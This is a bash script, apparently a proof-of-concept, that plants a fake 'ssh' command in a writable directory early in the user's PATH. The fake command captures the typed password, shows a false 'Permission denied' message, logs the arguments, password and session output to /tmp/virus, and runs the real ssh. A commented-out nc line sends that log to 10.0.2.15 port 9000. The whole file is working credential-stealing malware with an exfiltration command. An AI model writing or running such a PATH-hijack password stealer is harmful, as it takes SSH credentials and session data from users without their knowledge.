#!/bin/bash
mkdir -p $HOME/.local/bin

# Looks for editable directory in users path
for DIR in $(echo $PATH | sed s/\\:/\\n/g)
do
    [[ $DIR =~ home ]] && break
done

# Payload
cat > $DIR/ssh << 'EOF'
#!/bin/bash
echo "NOT SSH"
for USERNAME in $(echo $@ | sed s/\\s/\\n/g)
do
    [[ $USERNAME =~ @ ]] && break
done
read -s -p "${USERNAME}'s password:"
printf "\nPermission denied, please try again.\n"
touch /tmp/virus 
printf "ARGS: $@\n" >> /tmp/virus
printf "PASS: $REPLY\nLOG:\n" >> /tmp/virus
echo "START SSH"
/usr/bin/ssh $(echo $@) | tee -a /tmp/virus
#nc -q1 10.0.2.15 9000 < /tmp/virus
cat /tmp/virus
rm -rf /tmp/virus
EOF
chmod +x $DIR/ssh
